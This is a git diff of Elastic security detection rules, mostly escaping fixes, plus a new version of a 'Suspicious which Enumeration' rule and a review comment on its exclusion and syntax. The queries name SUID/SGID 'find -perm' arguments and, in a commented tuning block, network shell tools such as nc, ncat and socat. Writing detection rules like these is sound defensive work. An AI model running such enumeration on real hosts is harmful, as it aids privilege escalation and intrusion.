--- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_104.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "5aee924b-6ceb-4633-980e-1bde8cdb40c5", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json index 39bb1b8278b..fcf78558e21 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json index 90d027e9790..26471303962 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_106.json @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json index 1a2d2719fc2..da2a74f3ea0 100644 --- a/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5aee924b-6ceb-4633-980e-1bde8cdb40c5_107.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -80,7 +80,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json index 1fab64dc7f2..061af244e71 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_103.json 
@@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json index 3369bc3705a..e7d584f7616 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_104.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json index 8a162ef9404..de468943556 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_105.json @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json index aaa836cbc40..90c456e8853 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_106.json 
@@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json index f6b989454fd..eecc05b54c2 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json +++ b/packages/security_detection_engine/kibana/security_rule/5b03c9fb-9945-4d2f-9568-fd690fee3fba_107.json @@ -64,7 +64,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json index 5e3be062e3a..3ba1b0fefc3 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -82,7 +82,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -104,7 +104,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json index 2d426c769db..d73c785f95e 100644 
--- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_2.json @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -105,7 +105,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json index 591bc5b0412..cf54fb84e3d 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUID/SGUID Enumeration Detected", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count \u003e= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count >= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json index 9979cdb8146..eea1d846974 100644 
--- a/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json +++ b/packages/security_detection_engine/kibana/security_rule/5b06a27f-ad72-4499-91db-0c69667bffa5_4.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "SUID/SGUID Enumeration Detected", - "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count \u003e= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \nprocess.name == \"find\" and process.args : \"-perm\" and process.args : (\n \"/6000\", \"-6000\", \"/4000\", \"-4000\", \"/2000\", \"-2000\", \"/u=s\", \"-u=s\", \"/g=s\", \"-g=s\", \"/u=s,g=s\", \"/g=s,u=s\"\n) and not (\n user.Ext.real.id == \"0\" or group.Ext.real.id == \"0\" or process.args_count >= 12 or \n (process.args : \"/usr/bin/pkexec\" and process.args : \"-xdev\" and process.args_count == 7)\n)\n", "related_integrations": [ { "package": "endpoint", @@ -74,7 +74,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json index 39418412b3a..8aa76fd6c16 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_1.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious which Enumeration", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count \u003e= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", "related_integrations": [ { "package": "endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json index fe4bde7c974..00e9e471d0a 100644 
--- a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_2.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious which Enumeration", - "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count \u003e= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", "related_integrations": [ { "package": "endpoint", @@ -60,7 +60,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0007", "name": "Discovery", diff --git a/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_3.json b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_3.json new file mode 100644 index 00000000000..a96c68a1d92 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/5b18eef4-842c-4b47-970f-f08d24004bde_3.json 
@@ -0,0 +1,89 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "This rule monitors for the usage of the which command with an unusual amount of process arguments. Attackers may leverage the which command to enumerate the system for useful installed utilities that may be used after compromising a system to escalate privileges or move latteraly across the network.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious which Enumeration", + "query": "process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \nprocess.name == \"which\" and process.args_count >= 10 and not process.parent.name == \"jem\"\n\n/* potential tuning if rule would turn out to be noisy\nand process.args in (\"nmap\", \"nc\", \"ncat\", \"netcat\", nc.traditional\", \"gcc\", \"g++\", \"socat\") and \nprocess.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n*/ \n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "5b18eef4-842c-4b47-970f-f08d24004bde", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Data Source: Elastic Defend", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": 
"Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1082", + "name": "System Information Discovery", + "reference": "https://attack.mitre.org/techniques/T1082/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 3 + }, + "id": "5b18eef4-842c-4b47-970f-f08d24004bde_3", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json index a5e1dd5e661..fce9d0fb6c8 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json +++ b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_1.json @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json index e7421ddfcc6..1eaf4fcb958 100644 --- a/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json +++ b/packages/security_detection_engine/kibana/security_rule/5b9eb30f-87d6-45f4-9289-2bf2024f0376_2.json @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -97,7 +97,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", 
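Review bot: The new exclusion `and not process.parent.name == \"jem\"` in the `query` of the added 5b18eef4-842c-4b47-970f-f08d24004bde_3.json suppresses on the parent's process name alone, which is a weak allow-list key for a detection rule because the name is controlled by whoever launches the parent; if the intent is to quiet a known tool, anchoring the exclusion on `process.parent.executable` (full path) would be tighter, and the reason for excluding that parent should be recorded next to it, e.g. `/* jem: known benign caller of which with many args — exclusion rationale here */`. The commented-out tuning block carried into the same query string still has an unbalanced quote (`\"netcat\", nc.traditional\"` lacks the opening `\"` before `nc.traditional`), so it would not parse as intended if the tuning were ever enabled; the same text is present in the _1 and _2 versions touched earlier in this diff. The `description` also has a typo, `latteraly` → `laterally`. The new file ends without a trailing newline, unlike the other rule files, which the generator should normalize.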
diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json index bcb7415227c..7cebb8055cb 100644 --- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_102.json @@ -59,7 +59,7 @@ ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json index 0f9a14b6c47..85363def0b3 100644 --- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json +++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_103.json 
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json
index f16c70f32d9..e16560b726d 100644
--- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_104.json
@@ -59,7 +59,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -72,7 +72,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json
index 5d49b4370ba..6aca59680a2 100644
--- a/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/5bb4a95d-5a08-48eb-80db-4c3a63ec78a8_105.json
@@ -58,7 +58,7 @@
 ],
 "risk_score": 73,
 "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8",
- "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -71,7 +71,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0004",
 "name": "Privilege Escalation",
diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json
index 00bda565a46..2bfff3e7b35 100644
--- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_102.json
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json
index 2b29e680192..eb829a25fcd 100644
--- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_103.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json
index 891771633a6..c7429adbbef 100644
--- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_104.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json
index 72e57a9c6a7..87640fb5477 100644
--- a/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/5beaebc1-cc13-4bfc-9949-776f9e0dc318_205.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json b/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json
index a4107a042d0..d167504ff42 100644
--- a/packages/security_detection_engine/kibana/security_rule/5c6f4c58-b381-452a-8976-f1b1c6aa0def_2.json
